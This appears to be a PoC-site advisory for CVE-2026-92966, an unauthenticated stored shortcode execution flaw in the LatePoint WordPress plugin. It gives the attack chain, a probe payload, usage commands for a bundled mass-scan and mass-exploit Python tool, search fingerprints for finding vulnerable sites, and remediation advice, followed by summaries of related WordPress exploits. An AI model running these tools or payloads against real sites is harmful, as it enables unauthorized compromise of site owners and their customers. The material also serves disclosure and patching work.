CVE-2026-92966 — WordPress LatePoint ≤5.7.0 Stored Shortcode Execution (Customer Cabinet)
October 1, 2026 · 67 views
LatePoint appointment booking ≤5.7.0: unauthenticated guest booking stores [shortcode] in customer first/last name (sanitize_text_field keeps brackets); Customer Cabinet block renders welcome line then the_content do_shortcode runs twice → arbitrary shortcode execution. CVSS 9.1 Critical (CWE-94). Fixed in 5.7.1. No API key. Python PoC: check, mass exploit, --lab, optional POCBIT_EXEC_SHORTCODE. Marker POCBIT-92966-OK.
Description
Overview
CVE-2026-92966 — LatePoint WordPress appointment plugin — unauthenticated stored shortcode execution (Wordfence CNA; CVSS 3.1 9.1 Critical, CWE-94).
| | | |---|---| | Product | LatePoint | | Affected | ≤ 5.7.0 | | Fixed | ≥ 5.7.1 | | Verify marker | POCBIT-92966-OK | | Finder | hashiramasenju333 |
Guest booking stores customer first name / last name with sanitize_text_field() — square brackets are not stripped, so payloads like [caption]…[/caption] persist. The Customer Cabinet Gutenberg block renders Welcome with esc_html(full_name) (brackets survive). WordPress do_shortcode on the_content at priority 11 parses stored shortcodes a second time. 5.7.1 encodes delimiters via encode_shortcode_delimiters() on dashboard output.
PoC page: https://pocbit.org/pocs/cve-2026-92966
GitHub: murrez/CVE-2026-92966
CVE.org: CVE-2026-92966
Wordfence: Threat Intel advisory
Attack chain (summary)
- Plant — Unauthenticated booking: set
customer[first_name](or last name) to a shortcode payload (default probe: core[caption]POCBIT-92966-OK[/caption]). - Trigger — Load a page with the Customer Cabinet block as that customer (guest session after booking). Second
do_shortcodepass executes the stored shortcode.
Site-specific RCE may chain to dangerous plugin shortcodes via POCBIT_EXEC_SHORTCODE or --exec-shortcode.
Bundled tool (Python 3.10+)
Download cve-2026-92966.py — bundle extractor (poc.py, _engine.py, up.php).
pip install requests colorama
python cve-2026-92966.py
python poc.py --lab
python poc.py --check targets.txt
python poc.py targets.txt -t 20 -T 28
python poc.py -u https://target.example --check
python poc.py -u https://target.example
set POCBIT_EXEC_SHORTCODE=[your_shortcode_here]
python poc.py -u https://target.example
| Mode | Output |
|------|--------|
| check | hits.txt — readme ≤5.7.0, LatePoint fingerprints |
| exploit | exploited.txt — marker after plant + Customer Cabinet trigger |
Mass scan statuses include plant_no_auth_cookie, plant_missing_service_id, no_customer_cabinet_page, shortcode_not_triggered, patched_skip.
Discovery hints
body="/wp-content/plugins/latepoint/"
body="latepoint-book-form"
body="latepoint_helper"
Remediation
- Upgrade LatePoint to ≥ 5.7.1 immediately.
- Restrict public booking if not required; audit customer names for
[/]. - Temporary WAF: block brackets in booking name fields on
latepoint_route_call.
See also WordPress plugin vulnerabilities guide.
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- WordPressCVE-2026-96349critical
CVE-2026-96349 — WordPress SiteSkite ≤2.1.8 API-Key Autologin + MCP eval() RCE Chain
SiteSkite WordPress plugin ≤2.1.8: long-lived API key acts as unauthenticated admin bearer via ?token= autologin; REST/admin-ajax MCP abilities run siteskite_execute_php (eval) and file write. CVSS 10.0 Critical (CWE-94). Fixed in 2.2.0. Python PoC: check (readme ≤2.1.8), exploit with API key, mass hits/exploited, --lab. Marker POCBIT-96349-OK.
- WordPressCVE-2026-14281critical
CVE-2026-14281 — WAWP WordPress Unauthenticated Privilege Escalation (≤ 4.8.6)
Unauthenticated administrator via public WAWP REST signup: unsanitized wawp_custom_fields writes wp_capabilities through update_user_meta. Automation Web Platform plugin ≤ 4.8.6 (CVSS 3.1 9.8 Critical).
- WordPressCVE-2026-85984critical
CVE-2026-85984 — WordPress miniOrange OTP Unauthenticated Admin Bypass
Unauthenticated authentication bypass (CWE-287) in miniOrange OTP Login, Verification and SMS Notifications ≤ 5.5.5 via wp-login.php POST mo_wp_login_intent=otp with empty password — mo_by_pass_login() skip_pass_fallback skips password check when Admin OTP Bypass and related OTP login options are enabled. CVSS 3.1 9.8 Critical. Fixed in 5.5.6+. PoC: plugin scan, optional user enum, check/exploit modes.
- WordPressCVE-2026-92229high
CVE-2026-92229 — Forminator ≤ 1.57.2 Unauthenticated Shortcode Execution
Unauthenticated arbitrary shortcode execution in **Forminator** (≤ 1.57.2) via **`current_url`** in quiz-related AJAX handlers.